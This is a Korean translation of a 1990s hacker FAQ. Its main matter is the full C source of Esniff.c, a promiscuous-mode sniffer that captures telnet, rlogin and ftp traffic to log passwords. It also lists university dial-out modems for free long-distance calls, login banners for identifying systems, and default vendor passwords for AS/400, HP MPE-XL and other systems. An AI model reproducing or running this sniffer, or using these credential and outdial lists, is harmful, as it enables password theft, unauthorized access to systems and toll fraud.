--- 334 ---

! char c, *fing;

***************

*** 350,354 ****

! if (pwd = getpwuid(uid))

{

char *tmp;

--- 350,356 ----

! if (fing = getenv("CTCPFINGER"))

! send_ctcp_reply(from, ctcp->name, fing, diff, c);

! else if (pwd = getpwuid(uid))

{

char *tmp;


이상한 문자가 들어있는 디렉토리에 어떻게 들어갈 수 있나?

이러한 디렉토리는 정보를 숨기고자 하는 사람들에 의해서 이용된다. 대부분은 warez(불법 상업용 프로그램)의 사람들이다.

이러한 이상한 문자가 무엇인지 알아내는 몇가지 방법이 있다. 한 가지 방법으로 ls 명령의 인수을 이용하여 ls가 정보를 보여주도록 하는 방법이다.

> ls의 man 페이지에 다음과 같이 설명되어 있다.

-F Causes directories to be marked with a trailing ``/'',

executable files to be marked with a trailing ``*'', and

symbolic links to be marked with a trailing ``@'' symbol.

-q Forces printing of non-graphic characters in filenames as the

character ``?''.

-b Forces printing of non-graphic characters in the \ddd

notation, in octal.

아마도 가장 유용한 도구는 "ls -al filename"을 수행하여 ftp 사이트에 있는 디렉토리 이름을 자신의 기계에 저장하는 것이다. 그리고나서 "cat -t -v -e filename"을 수행하여 어떤 이상한 문자들이 들어 있는지 볼 수 있다.

> cat의 man 페이지에 다음과 같이 설명되어 있다.

-v Causes non-printing characters (with the exception of tabs,

newlines, and form feeds) to be displayed. Control characters

are displayed as ^X (<Ctrl>x), where X is the key pressed with

the <Ctrl> key (for example, <Ctrl>m is displayed as ^M). The

<Del> character (octal 0177) is printed as ^?. Non-ASCII

characters (with the high bit set) are printed as -x, where

x is the character specified by the seven low order bits.

-t Causes tabs to be printed as ^I and form feeds as ^L. This

option is ignored if the -v option is not specified.

-e Causes a ``$'' character to be printed at the end of each line

(prior to the new-line). This option is ignored if the -v

option is not set.

만일 디렉토리 이름에 <SPACE>나 <TAB>이 들어 있다면 따옴표 안에 디렉토리 이름 전체를 넣으면 된다. 예를 들어

cd "..<TAB>"

IBM-PC에서는 이러한 문자를 치기 위해서 <ALT>키를 누르고 숫자판에 있는 숫자를 눌러서 ASCII 번호에 맞게 넣어주면 된다. <ALT>를 떼면 화면에 특수 문자가 표시된다. ASCII표를 이용하면 편리하다.

때때로 사람들은 표준 stty 컨트롤 문자를 가지고 디렉토리 이름을 만든다. ^Z(일시정지), ^C(intr)과 같은. 이러한 문자를 포함하는 디렉토리에 들어가기 위해서는 사용자 stty의 컨트롤 문자를 다른 것으로 설정해야 한다.

> stty의 man 페이지에 다음과 같이 설명되어 있다.

Control assignments

control-character C

Sets control-character to C, where control-character is

erase, kill, intr (interrupt), quit, eof, eol, swtch

(switch), start, stop or susp.

start and stop are available as possible control char-

acters for the control-character C assignment.

If C is preceded by a caret (^) (escaped from the

shell), then the value used is the corresponding con-

trol character (for example, ^D is a <Ctrl>d; ^? is

interpreted as DELETE and ^- is interpreted as unde-

fined).

stty -a 명령을 이용해서 stty의 현재 설정이 어떻게 되어 있는지 알수 있다. 그리고 어떤 것이 문제를 일으키고 있는지 알 수 있다.

이더넷 엿보기(ethernet sniffing)란 무엇인가?

이더넷 훔쳐보기는 (소프트웨어를 이용하여) 흥미를 끄는 패킷을 raw 이더넷 장치를 통해서 하게 된다. ㅌ정 조건에 맞는 패킷을 소프트웨어에서 발견하면, 파일에 저장한다. 유용한 패킷에 대한 일상적인 기준으로는 "login"이나 "password"와 같은 단어를 포함하는 것이다.

많은 이더넷 훔쳐보기 프로그램이 있다. 예를 들면 다음과 같다.

OS Sniffer

~~ ~~~~~~~

4.3/4.4 BSD tcpdump /* Available via anonymous ftp */

FreeBSD tcpdump /* Available via anonymous ftp at */

/* gatekeeper.dec.com

/* /.0/BSD/FreeBSD/FreeBSD-current/src/contrib/tcpdump/ */

NetBSD tcpdump /* Available via anonymous ftp at */

/* gatekeeper.dec.com

/* /.0/BSD/NetBSD/NetBSD-current/src/usr.sbin/ */

DEC Unix tcpdump /* Available via anonymous ftp */

DEC Ultrix tcpdump /* Available via anonymous ftp */

HP/UX nettl (monitor)

& netfmt (display)

nfswatch /* Available via anonymous ftp */

Linux tcpdump /* Available via anonymous ftp at */

/* sunsite.unc.edu */

/* /pub/Linux/system/Network/management/ */

SGI Irix nfswatch /* Available via anonymous ftp */

Etherman

tcpdump /* Available via anonymous ftp */

Solaris snoop

tcpdump

SunOS etherfind

nfswatch /* Available via anonymous ftp */

tcpdump /* Available via anonymous ftp */

DOS ETHLOAD /* Available via anonymous ftp as */

/* ethld104.zip */

The Gobbler /* Available via anonymous ftp */

LanPatrol

LanWatch

Netmon

Netwatch

Netzhack /* Available via anonymous ftp at */

/* mistress.informatik.unibw-muenchen.de */

/* /pub/netzhack.mac */

Macintosh Etherpeek

여기에 예제 코드가 있다.

/* Esniff.c */

#include <stdio.h>

#include <ctype.h>

#include <string.h>

#include <sys/time.h>

#include <sys/file.h>

#include <sys/stropts.h>

#include <sys/signal.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <sys/ioctl.h>

#include <net/if.h>

#include <net/nit_if.h>

#include <net/nit_buf.h>

#include <net/if_arp.h>

#include <netinet/in.h>

#include <netinet/if_ether.h>

#include <netinet/in_systm.h>

#include <netinet/ip.h>

#include <netinet/udp.h>

#include <netinet/ip_var.h>

#include <netinet/udp_var.h>

#include <netinet/in_systm.h>

#include <netinet/tcp.h>

#include <netinet/ip_icmp.h>

#include <netdb.h>

#include <arpa/inet.h>

#define ERR stderr

char *malloc();

char *device,

*ProgName,

*LogName;

FILE *LOG;

int debug=0;

#define NIT_DEV "/dev/nit"

#define CHUNKSIZE 4096 /* device buffer size */

int if_fd = -1;

int Packet[CHUNKSIZE+32];

void Pexit(err,msg)

int err; char *msg;

{ perror(msg);

exit(err); }

void Zexit(err,msg)

int err; char *msg;

{ fprintf(ERR,msg);

exit(err); }

#define IP ((struct ip *)Packet)

#define IP_OFFSET (0x1FFF)

#define SZETH (sizeof(struct ether_header))

#define IPLEN (ntohs(ip->ip_len))

#define IPHLEN (ip->ip_hl)

#define TCPOFF (tcph->th_off)

#define IPS (ip->ip_src)

#define IPD (ip->ip_dst)

#define TCPS (tcph->th_sport)

#define TCPD (tcph->th_dport)

#define IPeq(s,t) ((s).s_addr == (t).s_addr)

#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))

#define MAXBUFLEN (128)

time_t LastTIME = 0;

struct CREC {

struct CREC *Next,

*Last;

time_t Time; /* start time */

struct in_addr SRCip,

DSTip;

u_int SRCport, /* src/dst ports */

DSTport;

u_char Data[MAXBUFLEN+2]; /* important stuff :-) */

u_int Length; /* current data length */

u_int PKcnt; /* # pkts */

u_long LASTseq;

};

struct CREC *CLroot = NULL;

char *Symaddr(ip)

register struct in_addr ip;

{ register struct hostent *he =

gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);

return( (he)?(he->h_name):(inet_ntoa(ip)) );

}

char *TCPflags(flgs)

register u_char flgs;

{ static char iobuf[8];

#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')

SFL(0,TH_FIN, 'F');

SFL(1,TH_SYN, 'S');

SFL(2,TH_RST, 'R');

SFL(3,TH_PUSH,'P');

SFL(4,TH_ACK, 'A');

SFL(5,TH_URG, 'U');

iobuf[6]=0;

return(iobuf);

}

char *SERVp(port)

register u_int port;

{ static char buf[10];

register char *p;

switch(port) {

case IPPORT_LOGINSERVER: p="rlogin"; break;

case IPPORT_TELNET: p="telnet"; break;

case IPPORT_SMTP: p="smtp"; break;

case IPPORT_FTP: p="ftp"; break;

default: sprintf(buf,"%u",port); p=buf; break;

}

return(p);

}

char *Ptm(t)

register time_t *t;

{ register char *p = ctime(t);

p[strlen(p)-6]=0; /* strip " YYYY\n" */

return(p);

}

char *NOWtm()

{ time_t tm;

time(&tm);

return( Ptm(&tm) );

}

#define MAX(a,b) (((a)>(b))?(a):(b))

#define MIN(a,b) (((a)<(b))?(a):(b))

/* add an item */

#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \

register struct CREC *CLtmp = \

(struct CREC *)malloc(sizeof(struct CREC)); \

time( &(CLtmp->Time) ); \

CLtmp->SRCip.s_addr = SIP.s_addr; \

CLtmp->DSTip.s_addr = DIP.s_addr; \

CLtmp->SRCport = SPORT; \

CLtmp->DSTport = DPORT; \

CLtmp->Length = MIN(LEN,MAXBUFLEN); \

bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \

CLtmp->PKcnt = 1; \

CLtmp->Next = CLroot; \

CLtmp->Last = NULL; \

CLroot = CLtmp; \

}

register struct CREC *GET_NODE(Sip,SP,Dip,DP)

register struct in_addr Sip,Dip;

register u_int SP,DP;

{ register struct CREC *CLr = CLroot;

while(CLr != NULL) {

if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&

IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )

break;

CLr = CLr->Next;

}

return(CLr);

}

#define ADDDATA_NODE(CL,DATA,LEN) { \

bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \

CL->Length += LEN; \

}

#define PR_DATA(dp,ln) { \

register u_char lastc=0; \

while(ln-- >0) { \

if(*dp < 32) { \

switch(*dp) { \

case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \

break; \

case '\r': \

case '\n': fprintf(LOG,"\n : "); \

break; \

default : fprintf(LOG,"^%c", (*dp + 64)); \

break; \

} \

} else { \

if(isprint(*dp)) fputc(*dp,LOG); \

else fprintf(LOG,"(%d)",*dp); \

} \

lastc = *dp++; \

} \

fflush(LOG); \

}

void END_NODE(CLe,d,dl,msg)

register struct CREC *CLe;

register u_char *d;

register int dl;

register char *msg;

{

fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));

fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));

fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));

fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",

NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);

fprintf(LOG," DATA: ");

{ register u_int i = CLe->Length;

register u_char *p = CLe->Data;

PR_DATA(p,i);

PR_DATA(d,dl);

}

fprintf(LOG,"\n-- \n");

fflush(LOG);

if(CLe->Next != NULL)

CLe->Next->Last = CLe->Last;

if(CLe->Last != NULL)

CLe->Last->Next = CLe->Next;

else

CLroot = CLe->Next;

free(CLe);

}

/* 30 mins (x 60 seconds) */

#define IDLE_TIMEOUT 1800

#define IDLE_NODE() { \

time_t tm; \

time(&tm); \

if(LastTIME<tm) { \

register struct CREC *CLe,*CLt = CLroot; \

LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \

while(CLe=CLt) { \

CLt=CLe->Next; \

if(CLe->Time <tm) \

END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \

} \

} \

}

void filter(cp, pktlen)

register char *cp;

register u_int pktlen;

{

register struct ip *ip;

register struct tcphdr *tcph;

{ register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);

if(EtherType < 0x600) {

EtherType = *(u_short *)(cp + SZETH + 6);

cp+=8; pktlen-=8;

}

if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */

return;

}

/* ugh, gotta do an alignment :-( */

bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));

ip = (struct ip *)Packet;

if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */

return;

tcph = (struct tcphdr *)(Packet + IPHLEN);

if(!( (TCPD == IPPORT_TELNET) ||

(TCPD == IPPORT_LOGINSERVER) ||

(TCPD == IPPORT_FTP)

)) return;

{ register struct CREC *CLm;

register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));

register u_char *p = (u_char *)Packet;

p += ((IPHLEN * 4) + (TCPOFF * 4));

if(debug) {

fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);

fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));

fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));

}

if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {

CLm->PKcnt++;

if(length>0)

if( (CLm->Length + length) < MAXBUFLEN ) {

ADDDATA_NODE( CLm, p,length);

} else {

END_NODE( CLm, p,length, "DATA LIMIT");

}

if(TCPFL(TH_FIN|TH_RST)) {

END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );

}

} else {

if(TCPFL(TH_SYN)) {

ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);

}

}

IDLE_NODE();

}

}

/* signal handler

*/

void death()

{ register struct CREC *CLe;

while(CLe=CLroot)

END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");

fprintf(LOG,"\nLog ended at => %s\n",NOWtm());

fflush(LOG);

if(LOG != stdout)

fclose(LOG);

exit(1);

}

/* opens network interface, performs ioctls and reads from it,

* passing data to filter function

*/

void do_it()

{

int cc;

char *buf;

u_short sp_ts_len;

if(!(buf=malloc(CHUNKSIZE)))

Pexit(1,"Eth: malloc");

/* this /dev/nit initialization code pinched from etherfind */

{

struct strioctl si;

struct ifreq ifr;

struct timeval timeout;

u_int chunksize = CHUNKSIZE;

u_long if_flags = NI_PROMISC;

if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)

Pexit(1,"Eth: nit open");

if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)

Pexit(1,"Eth: ioctl (I_SRDOPT)");

si.ic_timout = INFTIM;

if(ioctl(if_fd, I_PUSH, "nbuf") < 0)

Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");

timeout.tv_sec = 1;

timeout.tv_usec = 0;

si.ic_cmd = NIOCSTIME;

si.ic_len = sizeof(timeout);

si.ic_dp = (char *)&timeout;

if(ioctl(if_fd, I_STR, (char *)&si) < 0)

Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");

si.ic_cmd = NIOCSCHUNK;

si.ic_len = sizeof(chunksize);

si.ic_dp = (char *)&chunksize;

if(ioctl(if_fd, I_STR, (char *)&si) < 0)

Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");

strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));

ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';

si.ic_cmd = NIOCBIND;

si.ic_len = sizeof(ifr);

si.ic_dp = (char *)&ifr;

if(ioctl(if_fd, I_STR, (char *)&si) < 0)

Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");

si.ic_cmd = NIOCSFLAGS;

si.ic_len = sizeof(if_flags);

si.ic_dp = (char *)&if_flags;

if(ioctl(if_fd, I_STR, (char *)&si) < 0)

Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");

if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)

Pexit(1,"Eth: ioctl (I_FLUSH)");

}

while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {

register char *bp = buf,

*bufstop = (buf + cc);

while (bp < bufstop) {

register char *cp = bp;

register struct nit_bufhdr *hdrp;

hdrp = (struct nit_bufhdr *)cp;

cp += sizeof(struct nit_bufhdr);

bp += hdrp->nhb_totlen;

filter(cp, (u_long)hdrp->nhb_msglen);

}

}

Pexit((-1),"Eth: read");

}

/* Authorize your program, generate your own password and uncomment here */

/* #define AUTHPASSWD "EloiZgZejWyms" */

void getauth()

{ char *buf,*getpass(),*crypt();

char pwd[21],prmpt[81];

strcpy(pwd,AUTHPASSWD);

sprintf(prmpt,"(%s)UP? ",ProgName);

buf=getpass(prmpt);

if(strcmp(pwd,crypt(buf,pwd)))

exit(1);

}

*/

void main(argc, argv)

int argc;

char **argv;

{

char cbuf[BUFSIZ];

struct ifconf ifc;

int s,

ac=1,

backg=0;

ProgName=argv[0];

/* getauth(); */

LOG=NULL;

device=NULL;

while((ac<argc) && (argv[ac][0] == '-')) {

register char ch = argv[ac++][1];

switch(toupper(ch)) {

case 'I': device=argv[ac++];

break;

case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))

Zexit(1,"Output file cant be opened\n");

break;

case 'B': backg=1;

break;

case 'D': debug=1;

break;

default : fprintf(ERR,

"Usage: %s [-b] [-d] [-i interface] [-f file]\n",

ProgName);

exit(1);

}

}

if(!device) {

if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)

Pexit(1,"Eth: socket");

ifc.ifc_len = sizeof(cbuf);

ifc.ifc_buf = cbuf;

if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)

Pexit(1,"Eth: ioctl");

close(s);

device = ifc.ifc_req->ifr_name;

}

fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);

fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",

(debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");

if(!LOG)

LOG=stdout;

signal(SIGINT, death);

signal(SIGTERM,death);

signal(SIGKILL,death);

signal(SIGQUIT,death);

if(backg && debug) {

fprintf(ERR,"[Cannot bg with debug on]\n");

backg=0;

}

if(backg) {

register int s;

if((s=fork())>0) {

fprintf(ERR,"[pid %d]\n",s);

exit(0);

} else if(s<0)

Pexit(1,"fork");

if( (s=open("/dev/tty",O_RDWR))>0 ) {

ioctl(s,TIOCNOTTY,(char *)NULL);

close(s);

}

}

fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());

fflush(LOG);

do_it();

}


인터넷 아웃다이얼(Internet Outdial)이란?

인터넷 아웃다이얼이란 인터넷에 연결된 모뎀으로 그곳에 연결하여 다른 곳으로 전화를 할 수 있은 것이다. 정상적인 아웃다이얼은 지역 번호만을 호출한다. GOD(Global OutDial)은 장거리 전화을 할 수 있다. 아웃다이얼은 장거리 BBS를 호출할 수 있는 값싼 방법이다.


인터넷 아웃다이얼은 어디에 있나?

이 FAQ는 CoTNo #5에서 뽑아온 것이다.

인터넷 아웃다이얼 목록 v3.0

소개

요새 인터넷에 돌아 다니는 인터넷 아웃다이얼의 목록이 몇가지 있다. 다음에 나오는 것은 v 2.0과 다른 목록들을 합친 것이다. 다른 사람들의 것을 그냥 실은 다른 목록과는 달리 우리는 앉아서 하나씩 모두 테스트를 했다. 몇몇은 "접속거부" 또는 접속을 시도할 때 시간초과에 걸리기도 했다. 이런 것들은 죽은 것으로 했다.

Working Outdials

----------------

as of 12/29/94

NPA IP Address Instructions

--- ---------- ------------

215 isn.upenn.edu modem

217 dialout.cecer.army.mil atdt x,xxxXXXXX

218 modem.d.umn.edu atdt9,xxxXXXX

303 yuma.acns.colostate.edu 3020

412 myriad.pc.cc.cmu.edu 2600 Press D at the prompt

412 gate.cis.pitt.edu tn3270,

connect dialout.pitt.edu,

atdtxxxXXXX

413 dialout2400.smith.edu Ctrl } gets ENTER NUMBER: xxxxxxx

502 outdial.louisville.edu

502 uknet.uky.edu connect kecnet

@ dial: "outdial2400 or out"

602 acssdial.inre.asu.edu atdt8,,,,,[x][yyy]xxxyyyy

614 ns2400.acs.ohio-state.edu

614 ns9600.acs.ohio-state.edu

713 128.249.27.153 atdt x,xxxXXXX

714 modem.nts.uci.edu atdt[area]0[phone]

804 ublan.virginia.edu connect hayes, 9,,xxx-xxxx

804 ublan2.acc.virginia.edu connect telnet

connect hayes

Need Password

-------------

206 rexair.cac.washington.edu This is an unbroken password

303 yuma.ACNS.ColoState.EDU login: modem

404 128.140.1.239 .modem8|CR

415 annex132-1.EECS.Berkeley.EDU "dial1" or "dial2" or "dialer1"

514 cartier.CC.UMontreal.CA externe,9+number

703 wal-3000.cns.vt.edu dial2400 -aa

Dead/No Connect

---------------

201 idsnet

202 modem.aidt.edu

204 dial.cc.umanitoba.ca

204 umnet.cc.manitoba.ca "dial12" or "dial24"

206 dialout24.cac.washington.edu

207 modem-o.caps.maine.edu

212 B719-7e.NYU.EDU dial3/dial12/dial24

212 B719-7f.NYU.EDU dial3/dial12/dial24

212 DIALOUT-1.NYU.EDU dial3/dial12/dial24

212 FREE-138-229.NYU.EDU dial3/dial12/dial24

212 UP19-4b.NYU.EDU dial3/dial12/dial24

215 wiseowl.ocis.temple.edu "atz" "atdt 9xxxyyyy"

218 aa28.d.umn.edu "cli" "rlogin modem"

at "login:" type "modem"

218 modem.d.umn.edu Hayes 9,XXX-XXXX

301 dial9600.umd.edu

305 alcat.library.nova.edu

305 office.cis.ufl.edu

307 modem.uwyo.edu Hayes 0,XXX-XXXX

313 35.1.1.6 dial2400-aa or dial1200-aa

or dialout

402 dialin.creighton.edu

402 modem.criegthon.edu

404 broadband.cc.emory.edu ".modem8" or ".dialout"

408 dialout.scu.edu

408 dialout1200.scu.edu

408 dialout2400.scu.edu

408 dialout9600.scu.edu

413 dialout.smith.edu

414 modems.uwp.edu

416 annex132.berkely.edu atdt 9,,,,, xxx-xxxx

416 pacx.utcs.utoronto.ca modem

503 dialout.uvm.edu

513 dialout24.afit.af.mil

513 r596adi1.uc.edu

514 pacx.CC.UMontreal.CA externe#9 9xxx-xxxx

517 engdial.cl.msu.edu

602 dial9600.telcom.arizona.edu

603 dialout1200.unh.edu

604 dial24-nc00.net.ubc.ca

604 dial24-nc01.net.ubc.ca

604 dial96-np65.net.ubc.ca

604 gmodem.capcollege.bc.ca

604 hmodem.capcollege.bc.ca

609 128.119.131.11X (X= 1 - 4) Hayes

609 129.119.131.11x (x = 1 to 4)

609 wright-modem-1.rutgers.edu

609 wright-modem-2.rutgers.edu

612 modem_out12e7.atk.com

612 modem_out24n8.atk.com

614 ns2400.ircc.ohio-state.edu "dial"

615 dca.utk.edu dial2400 D 99k #

615 MATHSUN23.MATH.UTK.EDU dial 2400 d 99Kxxxxxxx

616 modem.calvin.edu

617 128.52.30.3 2400baud

617 dialout.lcs.mit.edu

617 dialout1.princeton.edu

617 isdn3.Princeton.EDU

617 jadwingymkip0.Princeton.EDU

617 lord-stanley.Princeton.EDU

617 mpanus.Princeton.EDU

617 mrmodem.wellesley.edu

617 old-dialout.Princeton.EDU

617 stagger.Princeton.EDU

617 sunshine-02.lcs.mit.edu

617 waddle.Princeton.EDU

619 128.54.30.1 atdt [area][phone]

619 dialin.ucsd.edu "dialout"

703 modem_pool.runet.edu

703 wal-3000.cns.vt.edu

713 128.249.27.154 "c modem96" "atdt 9xxx-xxxx"

or "Hayes"

713 modem12.bcm.tmc.edu

713 modem24.bcm.tmc.edu

713 modem24.bcm.tmc.edu

714 mdmsrv7.sdsu.edu atdt 8xxx-xxxx

714 modem24.nts.uci.edu

714 pub-gopher.cwis.uci.edu

801 dswitch.byu.edu "C Modem"

808 irmodem.ifa.hawaii.edu

902 star.ccs.tuns.ca "dialout"

916 129.137.33.72

916 cc-dnet.ucdavis.edu connect hayes/dialout

916 engr-dnet1.engr.ucdavis.edu UCDNET <ret> C KEYCLUB <ret>

??? 128.119.131.11X (1 - 4)

??? 128.200.142.5

??? 128.54.30.1 nue, X to discontinue, ? for Help

??? 128.6.1.41

??? 128.6.1.42

??? 129.137.33.72

??? 129.180.1.57

??? 140.112.3.2 ntu <none>

??? annexdial.rz.uni-duesseldorf.de

??? dial96.ncl.ac.uk

??? dialout.plk.af.mil

??? ee21.ee.ncu.edu.tw cs8005

??? im.mgt.ncu.edu.tw guest <none>

??? modem.cis.uflu.edu

??? modem.ireq.hydro.qc.ca

??? modems.csuohio.edu

??? sparc20.ncu.edu.tw u349633

??? sun2cc.nccu.edu.tw ?

??? ts-modem.une.oz.au

??? twncu865.ncu.edu.tw guest <none>

??? vtnet1.cns.ut.edu "CALL" or "call"

결론

죽은 아웃다이얼을 발견하거나, 명령이 바뀌었거나, 패스워드를 요구하거나 하면, 우리에게 연락하여 목록이 되도록 정확하게 할 수 있도록 해 주기 바란다. 목록에 추가하고 싶은 것이 있다면 우리에게 메일을 보내면 다음 버전의 모록이 나올 때, 자신의 이름을 옆에 넣어서 나오도록 하겠다. 즐겁게 이용하기를 ....

[편집자 주: 원래 출판이후에 이 문서가 갱신되었다]


이 시스템은 무엇인가?

AIX

~~~

IBM AIX Version 3 for RISC System/6000

(C) Copyrights by IBM and by others 1982, 1990.

login:

[AIX 시스템은 쉽게 알 수 있는데, 화면을 지우고 로그인 프롬프트를 화면 밑에]

[표시하는 유일한 Unix이기 때문이다.]

AS/400

~~~~~~

UserID?

Password?

Once in, type GO MAIN

CDC Cyber

~~~~~~~~~

WELCOME TO THE NOS SOFTWARE SYSTEM.

COPYRIGHT CONTROL DATA 1978, 1987.

88/02/16. 02.36.53. N265100

CSUS CYBER 170-730. NOS 2.5.2-678/3.

FAMILY:

패밀리 프롬프트에서 단지 리턴만을 치면 당므 프롬프트가 다음과 같이 나타난다.

USER NAME:

CISCO Router

~~~~~~~~~~~~

FIRST BANK OF TNO

95-866 TNO VirtualBank

REMOTE Router - TN043R1

Console Port

SN - 00000866

TN043R1>

DECserver

~~~~~~~~~

DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1

DPS502-DS700

(c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved

도움말이 필요하면 HELP를 친다.

Enter username> TNO

Local>

Hewlett Packard MPE-XL

~~~~~~~~~~~~~~~~~~~~~~

MPE XL:

EXPECTED A :HELLO COMMAND. (CIERR 6057)

MPE XL:

EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424)

MPE XL:

GTN

~~~

WELCOME TO CITIBANK. PLEASE SIGN ON.

XXXXXXXX

@

PASSWORD =

@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PLEASE ENTER YOUR ID:-1->

PLEASE ENTER YOUR PASSWORD:-2->

CITICORP (CITY NAME). KEY GHELP FOR HELP.

XXX.XXX

PLEASE SELECT SERVICE REQUIRED.-3->

Lantronix Terminal Server

~~~~~~~~~~~~~~~~~~~~~~~~~

Lantronix ETS16 Version V3.1/1(940623)

Type HELP at the 'Local_15> ' prompt for assistance.

Login password>

Meridian Mail (Northern Telecom Phone/Voice Mail System)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MMM MMMERIDIAN

MMMMM MMMMM

MMMMMM MMMMMM

MMM MMMMM MMM MMMMM MMMMM

MMM MMM MMM MMMMMM MMMMMM

MMM MMM MMM MMM MMM MMM

MMM MMM MMM MMMMM MMM

MMM MMM MMM MMM MMM

MMM MMM MMM MMM

MMM MMM MMM MMM

MMM MMM MMM MMM

MMM MMM MMM MMM

MMM MMM MMM MMM

Copyright (c) Northern Telecom, 1991

Novell ONLAN

~~~~~~~~~~~~

<Control-A aka smiley face>N

[시스템에 접근하기 위해서는 ONLAN/PC의 복사본을 가지고 있는 것이 제일 좋다.]

PC-Anywhere

~~~~~~~~~~~

<Control-A aka smiley face>P

[시스템에 접근하기 위해서는 PCAnywhere Remote의 복사본을 가지고 있는 것이 제일 좋다.]

PRIMOS

~~~~~~

PRIMENET 19.2.7F PPOA1

<any text>

ER!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CONNECT

Primenet V 2.3 (system)

LOGIN (you)

User id? (system)

SAPB5 (you)

Password? (system)

DROWSAP (you)

OK, (system)

ROLM CBX II

~~~~~~~~~~~

ROLM CBXII RELEASE 9004.2.34 RB295 9000D IBMHO27568

BIND DATE: 7/APR/93

COPYRIGHT 1980, 1993 ROLM COMPANY. ALL RIGHTS RESERVED.

ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM

COMPANY.

YOU HAVE ENTERED CPU 1

12:38:47 ON WEDNESDAY 2/15/1995

USERNAME: op

PASSWORD:

INVALID USERNAME-PASSWORD PAIR

ROLM-OSL

~~~~~~~~

MARAUDER10292 01/09/85(^G) 1 03/10/87 00:29:47

RELEASE 8003

OSL, PLEASE.

?

System75

~~~~~~~~

Login: root

INCORRECT LOGIN

Login: browse

Password:

Software Version: G3s.b16.2.2

Terminal Type (513, 4410, 4425): [513]

Tops-10

~~~~~~~

NIH Timesharing

NIH Tri-SMP 7.02-FF 16:30:04 TTY11

system 1378/1381/1453 Connected to Node Happy(40) Line # 12

Please LOGIN

.

VM/370

~~~~~~

VM/370

!

VM/ESA

~~~~~~

VM/ESA ONLINE

TBVM2 VM/ESA Rel 1.1 PUT 9200

USERID 와 PASSWORD를 치고 ENTER를 누른다.

(패스워드는 화면에 나타나지 않는다.)

USERID ===>

PASSWORD ===>

COMMAND ===>

Xylogics Annex Communications Server

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Annex Command Line Interpreter * Copyright 1991 Xylogics, Inc.

Checking authorization, Please wait... -

Annex username: TNO - Optional security check

Annex password: - Not always present

Permission granted

annex:

XXX에서의 처음(default) 패스워드는 무엇인가?

AIX

~~~

guest guest

AS/400

~~~~~~

qsecofr qsecofr /* master security officer */

qsysopr qsysopr /* system operator */

qpgmr qpgmr /* default programmer */

also

ibm password

ibm 2222

ibm service

qsecofr 1111111

qsecofr 2222222

qserv qserv

qsvr qsvr

secofr secofr

qsrv ibmce1

DECserver

~~~~~~~~~

ACCESS

SYSTEM

Dynix (The library software, not the UnixOS)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

('later'를 치면 로그인 프롬프트에서 빠져나올 수 있다.)

setup <no password>

library <no password>

circ <Social Security Number>

Hewlett Packard MPE-XL

~~~~~~~~~~~~~~~~~~~~~~

HELLO MANAGER.SYS

HELLO MGR.SYS

HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP

HELLO OP.OPERATOR

MGR CAROLIAN

MGR CCC

MGR CNAS

MGR CONV

MGR COGNOS

OPERATOR COGNOS

